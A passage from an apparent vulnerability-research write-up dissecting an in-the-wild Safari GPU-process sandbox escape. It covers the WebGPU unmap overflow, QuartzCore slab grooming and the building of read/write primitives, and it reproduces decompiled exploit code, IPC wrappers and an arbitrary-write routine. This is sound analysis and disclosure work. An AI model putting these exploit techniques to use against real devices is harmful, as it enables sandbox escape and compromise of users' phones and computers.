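    vm_address_t a = 0, b = 0, c = 0;
    vm_allocate(mach_task_self(), &a, 0x4000, VM_FLAGS_ANYWHERE);
    vm_allocate(mach_task_self(), &b, 0x4000, VM_FLAGS_ANYWHERE);
    vm_deallocate(mach_task_self(), a, 0x4000);  // punch a hole
    vm_allocate(mach_task_self(), &c, 0x4000, VM_FLAGS_ANYWHERE);
    // Bottom-up first-fit means c will very likely reuse a's hole.
    printf("a=0x%lx c=0x%lx\n", (unsigned long)a, (unsigned long)c);
    return 0;
}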

mapAsync

With the origin of the buffer figured out we can trace the GPU process side of the mapAsync IPC. Through various layers of indirection we eventually reach the following code with controlled offset and size values:

void* Buffer::getMappedRange(size_t offset, size_t size)

{

    // https://gpuweb.github.io/gpuweb/#dom-gpubuffer-getmappedrange

    auto rangeSize = size;

    if (size == WGPU_WHOLE_MAP_SIZE)

        rangeSize = computeRangeSize(m_size, offset);

    if (!validateGetMappedRange(offset, rangeSize)) {

        // FIXME: "throw an OperationError and stop."

        return nullptr;

    }

    m_mappedRanges.add({ offset, offset + rangeSize });

    m_mappedRanges.compact();

    return static_cast<char*>(m_buffer.contents) + offset;

}

m_buffer.contents is the base of the buffer which the GPU kernel driver mapped into the GPU process address space via AGXAccelerator::createBufferMemoryDescriptorInTaskWithOptions. This code stores the requested mapping range in m_mappedRanges then returns a raw pointer into the underlying page. Higher up the callstack that raw pointer and length are stored into the m_mappedRange field. The higher level code then makes a copy of the contents of the buffer at that offset, wrapping that copy in a Vector<> to send back over IPC.

unmap

Here's the implementation of the RemoteBuffer_Unmap IPC on the GPU process side. At this point data is a Vector<> sent by the WebContent client.

void RemoteBuffer::unmap(Vector<uint8_t>&& data)

{

    if (!m_mappedRange)

        return;

    ASSERT(m_isMapped);

    if (m_mapModeFlags.contains(PAL::WebGPU::MapMode::Write))

        memcpy(m_mappedRange->source, data.data(), data.size());

    m_isMapped = false;

    m_mappedRange = std::nullopt;

    m_mapModeFlags = { };

}

The issue is a sadly trivial one: whilst the RemoteBuffer code does check that the client has previously mapped this buffer object - and thus m_mappedRange contains the offset and size of that mapped range - it fails to verify that the size of the Vector<> of "modified contents" actually matches the size of the previously mapped range. Instead the code simply blindly memcpy's the client-supplied Vector<> into the mapped range using the Vector<>'s size rather than the range's.

This unchecked memcpy using values directly from an IPC is the in-the-wild sandbox escape vulnerability.

Here's the fix:

  void RemoteBuffer::unmap(Vector<uint8_t>&& data)

  {

-   if (!m_mappedRange)

+   if (!m_mappedRange || m_mappedRange->byteLength < data.size())

      return;

    ASSERT(m_isMapped);
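Abstracting away the WebKit specifics, the bug boils down to this pattern (a standalone model, not WebKit code):

#include <cstdint>
#include <cstring>
#include <vector>

struct MappedRange {
    uint8_t* source;    // start of the previously mapped range
    size_t byteLength;  // size of that range, fixed at map time
};

// Model of the buggy unmap: the destination range was fixed when the
// buffer was mapped, but the copy length comes straight from the
// attacker-controlled IPC payload.
void unmap_model(MappedRange& range, const std::vector<uint8_t>& data) {
    memcpy(range.source, data.data(), data.size()); // BUG: can exceed byteLength
}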

It should be noted that security issues with WebGPU are well-known and the JavaScript interface to WebGPU is disabled in Safari on iOS. But the IPCs which support that JavaScript interface were not disabled, meaning that WebGPU still presented a rich sandbox-escape attack surface. This seems like a significant oversight.

Destination unknown?

As we saw, the allocation site for the GPU buffer was hard to determine statically, which made it hard to get a picture of which objects were being groomed. Figuring out the overflow target and its allocation site was similarly tricky.

Statically following the implementation of the RemoteRenderingBackend::CreateImageBuffer IPC (which, based on the high-level flow of the exploit, appeared to be responsible for allocating the overflow target) again quickly ended up in system library code with no obvious targets.

Working with the theory that, given the simplicity of the heap groom, vm_allocate/mmap was likely somehow responsible for the allocations, I set breakpoints on those APIs in the Safari GPU process on an M1 Mac and ran the WebGL conformance tests. There was only a single place where mmap was called:

Target 0: (com.apple.WebKit.GPU) stopped.

(lldb) bt

* thread #30, name = 'RemoteRenderingBackend work queue',

  stop reason = breakpoint 12.1

* frame #0: mmap

  frame #1: QuartzCore`CA::CG::Queue::allocate_slab

  frame #2: QuartzCore`CA::CG::Queue::alloc

  frame #3: QuartzCore`CA::CG::ContextDelegate::fill_rects

  frame #4: QuartzCore`CA::CG::ContextDelegate::draw_rects_

  frame #5: CoreGraphics`CGContextFillRects

  frame #6: CoreGraphics`CGContextFillRect

  frame #7: CoreGraphics`CGContextClearRect

  frame #8: WebKit::ImageBufferShareableMappedIOSurfaceBackend::create

  frame #9: WebKit::RemoteRenderingBackend::createImageBuffer

This corresponds perfectly with the IPC we see called in the heap groom above!

To the core...

QuartzCore is part of the low-level drawing/rendering code on iOS. Reversing the code around the mmap site it seems to be a custom queue type used for drawing commands. Dumping the mmap'ed QueueSlab memory a little later on we see some structure:

(lldb) x/10xg $x0

0x13574c000: 0x00000001420041d0 0x0000000000000000

0x13574c010: 0x0000000000004000 0x0000000000003f10

0x13574c020: 0x000000013574c0f0 0x0000000000000000

Reversing some of the surrounding QuartzCore code we can figure out that the header has a structure something like this:

struct QuartzQueueSlab
{
  struct QuartzQueueSlab *free_list_ptr;
  uint64_t size_a;
  uint64_t mmap_size;
  uint64_t remaining_size;
  uint8_t *end;
  uint64_t f;
  uint8_t inline_buffer[16336];
};

It's a short header with a free-list pointer, some sizes then a pointer into an inline buffer. The fields are initialized like this:

mapped_base->free_list_ptr = 0;
mapped_base->size_a = 0;
mapped_base->mmap_size = mmap_size;
mapped_base->remaining_size = mmap_size - 0x30;
mapped_base->end = mapped_base->inline_buffer;

Diagram showing the state of a fresh QueueSlab, with the end pointer pointing to the start of the inline buffer.

The QueueSlab is a simple bump allocator: end starts off pointing to the start of the inline buffer, and gets bumped up by each allocation as long as remaining_size indicates there's still space available:

Diagram showing the end pointer moving forwards within the allocated slab buffer
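In C++ terms the fast path is roughly this (my simplification, using the struct reconstructed above and ignoring the 0x10-byte per-allocation header shown later):

void* queue_slab_alloc(QuartzQueueSlab* slab, uint64_t size) {
    uint64_t rounded = (size + 15) & ~15ull;  // 16-byte alignment
    if (slab->remaining_size < rounded)
        return nullptr;                       // caller falls back to a new slab
    uint8_t* p = slab->end;                   // current bump pointer
    slab->end = p + rounded;
    slab->remaining_size -= rounded;
    return p;
}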

Assuming that this is very likely the corruption target, the bytes with which the call to RemoteBuffer::Unmap would corrupt this header line up like this:

Diagram showing the QueueSlab fields corrupted by the primitive, with the arg value replacing the pointer to the inline buffer

b[0] = 0x7F6F3229LL;

b[1] = 0LL;

b[2] = 0LL;

b[3] = 0xFFFFLL;

b[4] = arg;

return IPC_RemoteBuffer_Unmap(dst, b, 40LL);

The exploit's wrapper around the RemoteBuffer::Unmap IPC takes a single argument, which lines up perfectly with the inline-buffer pointer of the QueueSlab, replacing it with an arbitrary value.

The queue slab is pointed to by a higher-level CA::CG::Queue object, which in turn is pointed to by a CGContext object.

Groom 2

Before triggering the Unmap overflow there's another groom:

remote_device_after_base_id = rand();

for (j = 0; j < 200; j++) {

  IPC_RemoteDevice_CreateBuffer_16k(

    remote_device_after_base_id + j);

}

semaphore_signal(semaphore_b);

semaphore_signal(semaphore_a);

IPC_RemoteRenderingBackend_CacheNativeImage(

  image_buffer_base_id + 34LL);

semaphore_signal(semaphore_b);

semaphore_signal(semaphore_a);

for (k = 0; k < 200; k++) {

  IPC_RemoteDevice_CreateBuffer_16k(

    remote_device_after_base_id + 200 + k);

}

This is clearly trying to place an allocation related to RemoteRenderingBackend::CacheNativeImage near a large number of allocations related to RemoteDevice::CreateBuffer, the IPC we saw earlier which causes the allocation of RemoteBuffer objects. The purpose of this groom will become clear later.

Overflow 1

The core primitive for the first overflow involves 4 IPC methods:

  1. RemoteBuffer::MapAsync - sets up the destination pointer for the overflow
  2. RemoteBuffer::Unmap - performs the overflow, corrupting queue metadata
  3. RemoteDisplayListRecorder::DrawNativeImage - uses the corrupted queue metadata to write a pointer to a controlled address
  4. RemoteCDMFactoryProxy::CreateCDM - discloses the written pointer value

We'll look at each of those in turn:

IPC 1 - MapAsync

for (m = 0; m < 6; m++) {

  index_of_corruptor = m;

  IPC_RemoteBuffer_MapAsync(remote_device_buffer_id_base + m,

                            0x4000LL,

                            0LL);

Diagram showing the relationship between RemoteBuffer objects, their backing buffers and the QueueSlab pages. The backing buffers and QueueSlab pages alternate

They iterate through all 6 of the RemoteBuffer objects in the hope that the groom successfully placed at least one of them directly before a QueueSlab allocation. This MapAsync IPC sets the RemoteBuffer's m_mappedRange->source field to point at the very end (hopefully at a QueueSlab.)

IPC 2 - Unmap

  wrap_remote_buffer_unmap(remote_device_buffer_id_base + m,

WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current - 0x88)

wrap_remote_buffer_unmap is the wrapper function we've seen snippets of before which calls the Unmap IPC:

void* wrap_remote_buffer_unmap(int64 dst, int64 arg)

{

  int64 b[5];

  b[0] = 0x7F6F3229LL;

  b[1] = 0LL;

  b[2] = 0LL;

  b[3] = 0xFFFFLL;

  b[4] = arg;

  return IPC_RemoteBuffer_Unmap(dst, b, 40LL);

}

The arg value passed to wrap_remote_buffer_unmap (which is the base target address for the overwrite in the next step) is (WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current - 0x88), a symbol which was linked by the JS find-and-replace on the Mach-O; it points to the global variable used here:

int64 WTF::ObjectIdentifierBase::generateIdentifierInternal()

{

  return ++WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current;

}

As the name suggests, this is used to generate unique ids using a monotonically-increasing counter (there is a level of locking above this function.) The value passed in the Unmap IPC points 0x88 below the address of ::current.

Diagram showing the corruption primitive being used to move the end pointer out of the allocated buffer to 0x88 bytes below the target

If the groom works, this has the effect of corrupting a QueueSlab's inline buffer pointer with a pointer to 0x88 bytes below the counter used by the GPU process to allocate new identifiers.

IPC 3 - DrawNativeImage

for ( n = 0; n < 0x22; ++n )  {

  if (n == 2 || n == 4 || n == 6 || n == 8 || n == 10 || n == 12) {

    continue;

  }

  IPC_RemoteDisplayListRecorder_DrawNativeImage(

    image_buffer_base_id + n,// potentially corrupted target

    image_buffer_base_id + 34LL);

The exploit then iterates through all the ImageBuffer objects (skipping those which were released to make gaps for the RemoteBuffers) and passes each in turn as the first argument to IPC_RemoteDisplayListRecorder_DrawNativeImage. The hope is that one of them has had its associated QueueSlab structure corrupted. The second argument passed to DrawNativeImage is the ImageBuffer which had CacheNativeImage called on it earlier.

Let's follow the implementation of DrawNativeImage on the GPU process side to see what happens with the corrupted QueueSlab associated with that first ImageBuffer:

void RemoteDisplayListRecorder::drawNativeImage(

  RenderingResourceIdentifier imageIdentifier,

  const FloatSize& imageSize,

  const FloatRect& destRect,

  const FloatRect& srcRect,

  const ImagePaintingOptions& options)

{

  drawNativeImageWithQualifiedIdentifier(

    {imageIdentifier, m_webProcessIdentifier},

    imageSize,

    destRect,

    srcRect,

    options);

}

This immediately calls through to:

void

RemoteDisplayListRecorder::drawNativeImageWithQualifiedIdentifier(

  QualifiedRenderingResourceIdentifier imageIdentifier,

  const FloatSize& imageSize,

  const FloatRect& destRect,

  const FloatRect& srcRect,

  const ImagePaintingOptions& options)

{

  RefPtr image = resourceCache().cachedNativeImage(imageIdentifier);

  if (!image) {

    ASSERT_NOT_REACHED();

    return;

  }

  handleItem(DisplayList::DrawNativeImage(

               imageIdentifier.object(),

               imageSize,

               destRect,

               srcRect,

               options),

             *image);

}

imageIdentifier here corresponds to the ID of the ImageBuffer which was passed to CacheNativeImage earlier. Looking briefly at the implementation of CacheNativeImage we can see that it allocates a NativeImage object (which is what ends up being returned by the call to cachedNativeImage above):

void

RemoteRenderingBackend::cacheNativeImage(

  const ShareableBitmap::Handle& handle,

  RenderingResourceIdentifier nativeImageResourceIdentifier)

{

  cacheNativeImageWithQualifiedIdentifier(

    handle,

    {nativeImageResourceIdentifier,

      m_gpuConnectionToWebProcess->webProcessIdentifier()}

  );

}

void

RemoteRenderingBackend::cacheNativeImageWithQualifiedIdentifier(

  const ShareableBitmap::Handle& handle,

  QualifiedRenderingResourceIdentifier nativeImageResourceIdentifier)

{

  auto bitmap = ShareableBitmap::create(handle);

  if (!bitmap)

    return;

  auto image = NativeImage::create(

                 bitmap->createPlatformImage(

                   DontCopyBackingStore,

                   ShouldInterpolate::Yes),

                 nativeImageResourceIdentifier.object());

  if (!image)

    return;

  m_remoteResourceCache.cacheNativeImage(

    image.releaseNonNull(),

    nativeImageResourceIdentifier);

}

This NativeImage object is allocated by the default system malloc.

Returning to the DrawNativeImage flow we reach this:

void DrawNativeImage::apply(GraphicsContext& context, NativeImage& image) const

{

    context.drawNativeImage(image, m_imageSize, m_destinationRect, m_srcRect, m_options);

}

The context object is a GraphicsContextCG, a wrapper around a system CoreGraphics CGContext object:

void GraphicsContextCG::drawNativeImage(NativeImage& nativeImage, const FloatSize& imageSize, const FloatRect& destRect, const FloatRect& srcRect, const ImagePaintingOptions& options)

This ends up calling:

CGContextDrawImage(context, adjustedDestRect, subImage.get());

Which calls CGContextDrawImageWithOptions.

Through a few more levels of indirection in the CoreGraphics library this eventually reaches:

int64 CA::CG::ContextDelegate::draw_image_(

  int64 delegate,

  int64 a2,

  int64 a3,

  CGImage *image...) {

...

  alloc_from_slab = CA::CG::Queue::alloc(queue, 160);

  if (alloc_from_slab)

   CA::CG::DrawImage::DrawImage(

     alloc_from_slab,

     Info_2,

     a2,

     a3,

     FillColor_2,

     &v18,

     AlternateImage_0);

Via the delegate object the code retrieves the CGContext and from there the Queue with the corrupted QueueSlab. The code then makes a 160-byte allocation from the corrupted queue slab.

void*

CA::CG::Queue::alloc(CA::CG::Queue *q, __int64 size)

{

  uint64_t *buffer;

...

  size_rounded = (size + 31) & 0xFFFFFFFFFFFFFFF0LL;

  current_slab = q->current_slab;

  if ( !current_slab )

    goto alloc_slab;

  if ( !q->c || current_slab->remaining_size >= size_rounded )

    goto GOT_ENOUGH_SPACE;

...

GOT_ENOUGH_SPACE:

    remaining_size = current_slab->remaining_size;

    new_remaining = remaining_size - size_rounded;

    if ( remaining_size >= size_rounded )

    {

      buffer = current_slab->end;

      current_slab->remaining_size = new_remaining;

      current_slab->end = buffer + size_rounded;

      goto RETURN_ALLOC;

...

RETURN_ALLOC:

  buffer[0] = size_rounded;

  atomic_fetch_add(q->alloc_meta);

  buffer[1] = q->alloc_meta

...

  return &buffer[2];

}

When CA::CG::Queue::alloc attempts to allocate from the corrupted QueueSlab, it sees that the slab claims to have 0xffff bytes of free space remaining, so it proceeds to write a 0x10-byte header into the buffer by following the end pointer, then returns that end pointer plus 0x10. This has the effect of returning a value which points 0x78 bytes below the WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current global.

draw_image_ then passes this allocation as the first argument to CA::CG::DrawImage::DrawImage (with the cachedImage pointer as the final argument.)

int64 CA::CG::DrawImage::DrawImage(

  int64 slab_buf,

  int64 a2,

  int64 a3,

  int64 a4,

  int64 a5,

  OWORD *a6,

  CGImage *img)

{

...

*(void **)(slab_buf + 0x78) = CGImageRetain(img);

DrawImage writes the pointer to the cachedImage object to +0x78 in the fake slab allocation, which happens now to exactly overlap WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current. This has the effect of replacing the current value of the ::current monotonic counter with the address of the cached NativeImage object.
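The pointer arithmetic lines up exactly:

slab->end           = &current - 0x88   (corrupted via Unmap)
Queue::alloc header at &current - 0x88   (0x10 bytes of size and metadata)
returned allocation = &current - 0x88 + 0x10 = &current - 0x78
DrawImage store     at allocation + 0x78 = &current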

IPC 4 - CreateCDM

The final step in this section is to then call any IPC which causes the GPU process to allocate a new identifier using generateIdentifierInternal:

interesting_identifier = IPC_RemoteCDMFactoryProxy_CreateCDM();

If the new identifier is greater than 0x10000 they mask off the lower 4 bits and have successfully disclosed the remote address of the cached NativeImage object (the malloc'ed NativeImage is 16-byte aligned, and the counter will only have been incremented a handful of times since the overwrite, so masking the low 4 bits recovers the original pointer).

Over and over - arbitrary read

The next stage is to build an arbitrary read primitive, this time using 5 IPCs:

  1. MapAsync - sets up the destination pointer for the overflow
  2. Unmap - performs the overflow, corrupting queue metadata
  3. SetCTM - sets up parameters
  4. FillRect - writes the parameters through a controlled pointer
  5. CreateRecorder - returns data read from an arbitrary address

Arbitrary read IPC 1 & 2: MapAsync/Unmap

MapAsync and Unmap are used to again corrupt the same QueueSlab object, but this time the queue slab buffer pointer is corrupted to point 0x18 bytes below the following symbol:

WebCore::MediaRecorderPrivateWriter::mimeType(void)const::$_11::operator() const(void)::impl

Specifically, that symbol is the constant StringImpl object for the "audio/mp4" string returned by reference from this function:

const String&

MediaRecorderPrivateWriter::mimeType() const {

  static NeverDestroyed<const String>

    audioMP4(MAKE_STATIC_STRING_IMPL("audio/mp4"));

  static NeverDestroyed<const String>

    videoMP4(MAKE_STATIC_STRING_IMPL("video/mp4"));

  return m_hasVideo ? videoMP4 : audioMP4;

}

Concretely this is a StringImplShape object with this layout:

class STRING_IMPL_ALIGNMENT StringImplShape {

    unsigned m_refCount;

    unsigned m_length;

    union {

        const LChar* m_data8;

        const UChar* m_data16;

        const char* m_data8Char;

        const char16_t* m_data16Char;

    };

    mutable unsigned m_hashAndFlags;

};

Arbitrary read IPC 3: SetCTM

The next IPC is RemoteDisplayListRecorder::SetCTM:

messages -> RemoteDisplayListRecorder NotRefCounted Stream {

...

    SetCTM(WebCore::AffineTransform ctm) StreamBatched

...

CTM is the "Current Transform Matrix" and the WebCore::AffineTransform object passed as the argument is a simple struct with 6 double values defining an affine transformation.

The exploit IPC wrapper function takes two arguments in addition to the image buffer id, and from the surrounding context it's clear that they must be a length and pointer for the arbitrary read:

IPC_RemoteDisplayListRecorder_SetCTM(

  candidate_corrupted_target_image_buffer_id,

  (read_this_much << 32) | 0x100,

  read_from_here);

The wrapper passes those two 64-bit values as the first two "doubles" in the IPC. On the receiver side the implementation doesn't do much apart from directly store those affine transform parameters into the CGContext's CGGState object:

void

setCTM(const WebCore::AffineTransform& transform) final

{

  GraphicsContextCG::setCTM(

    m_inverseImmutableBaseTransform * transform);

}

void

GraphicsContextCG::setCTM(const AffineTransform& transform)

{

  CGContextSetCTM(platformContext(), transform);

  m_data->setCTM(transform);

  m_data->m_userToDeviceTransformKnownToBeIdentity = false;

}

Reversing CGContextSetCTM we see that the transform is just stored into a 0x30-byte field at offset +0x18 in the CGContext's CGGState object (at +0x60 in the CGContext):

188B55CD4  EXPORT _CGContextSetCTM                      

188B55CD4  MOV   X8, X0

188B55CD8  CBZ   X0, loc_188B55D0C

188B55CDC  LDR   W9, [X8,#0x10]

188B55CE0  MOV   W10, #'CTXT'

188B55CE8  CMP   W9, W10

188B55CEC  B.NE  loc_188B55D0C

188B55CF0  LDR   X8, [X8,#0x60]

188B55CF4  LDP   Q0, Q1, [X1]

188B55CF8  LDR   Q2, [X1,#0x20]

188B55CFC  STUR  Q2, [X8,#0x38]

188B55D00  STUR  Q1, [X8,#0x28]

188B55D04  STUR  Q0, [X8,#0x18]

188B55D08  RET

Arbitrary read IPC 4: FillRect

This IPC takes a similar path to the DrawNativeImage IPC discussed earlier. It allocates a new buffer from the corrupted QueueSlab, with the value returned by CA::CG::Queue::alloc this time pointing 8 bytes below the "audio/mp4" StringImpl. FillRect eventually reaches this code:

CA::CG::DrawOp::DrawOp(slab_ptr, a1, a3, CGGState, a5, v24);

...

  CTM_2 = (_OWORD *)CGGStateGetCTM_2(CGGState);

  v13 = CTM_2[1];

  v12 = CTM_2[2];

  *(_OWORD *)(slab_ptr + 8) = *CTM_2;

  *(_OWORD *)(slab_ptr + 0x18) = v13;

  *(_OWORD *)(slab_ptr + 0x28) = v12;

…which just directly copies the 6 CTM doubles to offset +8 in the allocation returned by the corrupted QueueSlab, which overlaps completely with the StringImpl, corrupting the string length and buffer pointer.
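To make the overlap concrete, here's a standalone model (my own; the layout is assumed to match the StringImplShape shown earlier) of how the two 64-bit values smuggled through SetCTM land on the string's fields:

#include <cstdint>
#include <cstdio>
#include <cstring>

struct StringImplShape {
    unsigned m_refCount;
    unsigned m_length;
    const char* m_data8;
    unsigned m_hashAndFlags;
};

int main() {
    uint64_t read_this_much = 0x3000;       // hypothetical read length
    uint64_t read_from_here = 0x13574c000;  // hypothetical target address
    // The first two "doubles" of the CTM, as built by the exploit wrapper:
    uint64_t ctm[2] = { (read_this_much << 32) | 0x100, read_from_here };
    StringImplShape s {};
    // FillRect's copy starts 8 bytes into the slab allocation, i.e. exactly
    // at the StringImpl base; only the first two values are modelled here.
    memcpy(&s, ctm, sizeof(ctm));
    printf("refCount=0x%x length=0x%x data8=%p\n",
           s.m_refCount, s.m_length, (const void*)s.m_data8);
    return 0;
}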

Arbitrary read IPC 5: CreateRecorder

messages -> RemoteMediaRecorderManager NotRefCounted {

  CreateRecorder(

    WebKit::MediaRecorderIdentifier id,

    bool hasAudio,

    bool hasVideo,

    struct WebCore::MediaRecorderPrivateOptions options)

      ->

    ( std::optional<WebCore::ExceptionData> creationError,

      String mimeType,

      unsigned audioBitRate,

      unsigned videoBitRate)

  ReleaseRecorder(WebKit::MediaRecorderIdentifier id)

}

The CreateRecorder IPC returns, among other things, the contents of the mimeType String which FillRect corrupted to point to an arbitrary location, yielding the arbitrary read primitive.

What to read?

Recall that the cacheNativeImage operation was sandwiched between two batches of 200 RemoteBuffer allocations via the RemoteDevice::CreateBuffer IPC.

Note that earlier (for the MapAsync/Unmap corruption) it was the backing buffer pages of the RemoteBuffer which were the groom target - that's not the case for the memory disclosure. The target is instead the AGXG15FamilyBuffer object, the wrapper object which points to those backing pages. These are also allocated during the RemoteDevice::CreateBuffer IPC calls. Crucially, these wrapper objects are allocated by the default malloc implementation, which is malloc_zone_malloc using the default ("scalable") zone. @elvanderb covered the operation of this heap allocator in their "Heapple Pie" presentation. Provided that the targeted allocation size's freelist is empty this zone will allocate upwards, making it likely that the NativeImage and AGXG15FamilyBuffer objects will be near each other in virtual memory.

They use the arbitrary read primitive to read 3 pages of data from the GPU process, starting from the address of the cached NativeImage, and search for a value matching the AGXG15FamilyBuffer Objective-C class pointer - i.e. a candidate isa field - masking out any PAC bits:

for ( ii = 0; ii < 0x1800; ++ii ) {

  if ( ((leaker_buffer_contents[ii] >> 8) & 0xFFFFFFFF0LL) ==

    (AGXMetalG15::_OBJC_CLASS___AGXG15FamilyBuffer & 0xFFFFFFFF0LL) )

...

What to write?

If the search is successful they now know the absolute address of one of the AGXG15FamilyBuffer objects - but at this point they don't know which of the RemoteBuffer objects it corresponds to.

They use the same Map/Unmap/SetCTM/FillRect IPCs as in the setup for the arbitrary read to write the address of WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current (the monotonic unique id counter seen earlier) into the field at +0x98 of the AGXG15FamilyBuffer.

Looking at the class hierarchy of AGXG15FamilyBuffer (AGXG15FamilyBuffer : AGXBuffer : IOGPUMetalBuffer : IOGPUMetalResource : _MTLResource : _MTLObjectWithLabel : NSObject) we find that +0x98 is the virtualAddress property of IOGPUMetalResource.

@interface IOGPUMetalResource : _MTLResource <MTLResourceSPI> {

        IOGPUMetalResource* _res;

        IOGPUMetalResource* next;

        IOGPUMetalResource* prev;

        unsigned long long uniqueId;

}

@property (readonly) _IOGPUResource* resourceRef;

@property (nonatomic,readonly) void* virtualAddress;

@property (nonatomic,readonly) unsigned long long gpuAddress;

@property (nonatomic,readonly) unsigned resourceID;

@property (nonatomic,readonly) unsigned long long resourceSize;

@property (readonly) unsigned long long cpuCacheMode;

I mentioned earlier that the destination pointer for the MapAsync/Unmap bad memcpy was calculated from a buffer property called contents, not virtualAddress:

  return static_cast<char*>(m_buffer.contents) + offset;

Dot syntax in Objective-C is syntactic sugar for calling an accessor method; the contents accessor directly calls the virtualAddress accessor, which returns the virtualAddress field:

void* -[IOGPUMetalBuffer contents]

  B               _objc_msgSend$virtualAddress_1

[IOGPUMetalResource virtualAddress]

ADRP   X8, #_OBJC_IVAR_$_IOGPUMetalResource._res@PAGE

LDRSW  X8, [X8,#_OBJC_IVAR_$_IOGPUMetalResource._res@PAGEOFF] ; 0x18

ADD    X8, X0, X8

LDR    X0, [X8,#0x80]

RET

They then loop through each of the candidate RemoteBuffer objects, mapping the beginning then unmapping with an 8 byte buffer, causing a write of a sentinel value through the potentially corrupted IOGPUMetalResource::virtualAddress field:

for ( jj = 200; jj < 400; ++jj )

{

  sentinel = 0x3A30DD9DLL;

  IPC_RemoteBuffer_MapAsync(remote_device_after_base_id + jj, 0LL, 0LL);

  IPC_RemoteBuffer_Unmap(remote_device_after_base_id + jj, &sentinel, 8LL);

  semaphore_signal(semaphore_a);

  CDM = IPC_RemoteCDMFactoryProxy_CreateCDM();

  if ( CDM >= 0x3A30DD9E && CDM <= 0x3A30DF65 ) {

    ...

After each write they request a new CDM and look to see whether they got a resource ID near the sentinel value they set - if so then they've found a RemoteBuffer whose virtual address they can completely control!

They store this id and use it to build their final arbitrary write primitive with 6 IPCs:

arbitrary_write(u64 ptr, u64 value_ptr, u64 size) {

  IPC_RemoteBuffer_MapAsync(

   remote_device_buffer_id_base + index_of_corruptor,

   0x4000LL, 0LL);

  wrap_remote_buffer_unmap(

    remote_device_buffer_id_base + index_of_corruptor,

    agxg15familybuffer_plus_0x80);

  IPC_RemoteDisplayListRecorder_SetCTM(

    candidate_corrupted_target_image_buffer_id,

    ptr,

    0LL);

  IPC_RemoteDisplayListRecorder_FillRect(

    candidate_corrupted_target_image_buffer_id);

  IPC_RemoteBuffer_MapAsync(

    device_id_with_corrupted_backing_buffer_ptr, 0LL, 0LL);

  IPC_RemoteBuffer_Unmap(

    device_id_with_corrupted_backing_buffer_ptr, value_ptr, size);

}

The first MapAsync/Unmap pair corrupts the original QueueSlab, pointing its buffer pointer to 0x18 bytes below the address of the virtualAddress field of an AGXG15FamilyBuffer.

SetCTM and FillRect then cause the arbitrary write target pointer value to be written through the corrupted QueueSlab allocation to replace the AGXG15FamilyBuffer's virtualAddress member.

The final MapAsync/Unmap pair then write through that corrupted virtualAddress field, yielding an arbitrary write primitive which won't corrupt any surrounding memory.

Mitigating mitigations

At this point the attackers have an arbitrary read/write primitive - it's surely game over. Nevertheless, the most fascinating parts of this exploit are still to come.

Remember, they are not just seeking to exploit this one vulnerability; they are seeking to minimize the marginal cost of successfully building and maintaining as many full exploit chains as possible. This is typically done using custom frameworks which permit code-reuse across exploits. In this case the goal is to use resources (IOKit userclients) which only the GPU Process has access to, and this is done in a very generic way using a custom framework which needs only a few arbitrary writes to kick off.


What's old is new again - NSArchiver

The FORCEDENTRY sandbox escape exploit which I wrote about last year used a logic flaw to enable the evaluation of an NSExpression across a sandbox boundary. If you're unfamiliar with NSExpression exploitation I'd recommend reading that post first.

As part of the fix for that issue Apple introduced various hardening measures intended to restrict both the computational power of NSExpressions as well as the particular avenue used to cause the evaluation of an NSExpression during object deserialization.

The functionality was never actually removed though. Instead, it was deprecated and gated behind various flags. This likely did lock down the attack surface from certain perspectives; but with a sufficiently powerful initial primitive (like an arbitrary read/write) those flags can simply be flipped and the full power of NSExpression-based scripting can be regained. And that's exactly what this exploit continues on to do...

Flipping bits

Using the arbitrary read/write they flip the globals used in places like __NSCoderEnforceFirstPartySecurityRules to disable various security checks.

They also swap around the implementation class of NSSharedKeySet to be PrototypeTools::_OBJC_CLASS___PTModule and swap the NSKeyPathSpecifierExpression and NSFunctionExpression classRefs to point to each other.

Forcing Entry

We've seen throughout this writeup that Safari has its own IPC mechanism with custom serialization - it's not using XPC or MIG or protobuf or Mojo or any of the dozens of other serialization options. But is it the case that everything gets serialized with their custom code?

As we observed in the ForcedEntry writeup, it's often just one tiny, innocuous line of code which ends up opening up an enormous extra attack surface. In ForcedEntry it was a seemingly simple attempt to edit the loop count of a GIF. Here, there's another simple piece of code which opens up a huge and potentially unexpected extra attack surface: NSKeyedArchiver. It turns out you can get NSKeyedArchiver objects serialized and deserialized across a Safari IPC boundary, specifically using this IPC:

  RedirectReceived(

    WebKit::RemoteMediaResourceIdentifier identifier,

    WebCore::ResourceRequest request,

    WebCore::ResourceResponse response)

  ->

    (WebCore::ResourceRequest returnRequest)

This IPC takes two arguments:

WebCore::ResourceRequest request

WebCore::ResourceResponse response

Let's look at the ResourceRequest deserialization code:

bool

ArgumentCoder<ResourceRequest>::decode(

  Decoder& decoder,

  ResourceRequest& resourceRequest)

{

  bool hasPlatformData;

  if (!decoder.decode(hasPlatformData))

    return false;

  bool decodeSuccess =

    hasPlatformData ?

      decodePlatformData(decoder, resourceRequest)

    :

      resourceRequest.decodeWithoutPlatformData(decoder);

That in turn calls:

bool

ArgumentCoder<WebCore::ResourceRequest>::decodePlatformData(

  Decoder& decoder,

  WebCore::ResourceRequest& resourceRequest)

{

  bool requestIsPresent;

  if (!decoder.decode(requestIsPresent))

     return false;

  if (!requestIsPresent) {

    resourceRequest = WebCore::ResourceRequest();

    return true;

  }

  auto request = IPC::decode<NSURLRequest>(

                   decoder, NSURLRequest.class);

That last line decoding request looks slightly different to the others - rather than calling decoder.decode(), passing the field to decode by reference, they're explicitly typing the field in the template invocation, which takes a different decoder path:

template<typename T, typename>

std::optional<RetainPtr<T>> decode(

  Decoder& decoder, Class allowedClass)

{

    return decode<T>(decoder, allowedClass ?

                              @[ allowedClass ] : @[ ]);

}

(Note that the @[] syntax defines an Objective-C array literal, so this is creating an array with a single entry.)

This then calls:

template<typename T, typename>

std::optional<RetainPtr<T>> decode(

  Decoder& decoder, NSArray<Class> *allowedClasses)

{

  auto result = decodeObject(decoder, allowedClasses);

  if (!result)

    return std::nullopt;

  ASSERT(!*result ||

         isObjectClassAllowed((*result).get(), allowedClasses));

  return { *result };

}

This continues on to a different argument decoder implementation than the one we've seen so far:

std::optional<RetainPtr<id>>

decodeObject(

  Decoder& decoder,

  NSArray<Class> *allowedClasses)

{

  bool isNull;

  if (!decoder.decode(isNull))

    return std::nullopt;

  if (isNull)

    return { nullptr };
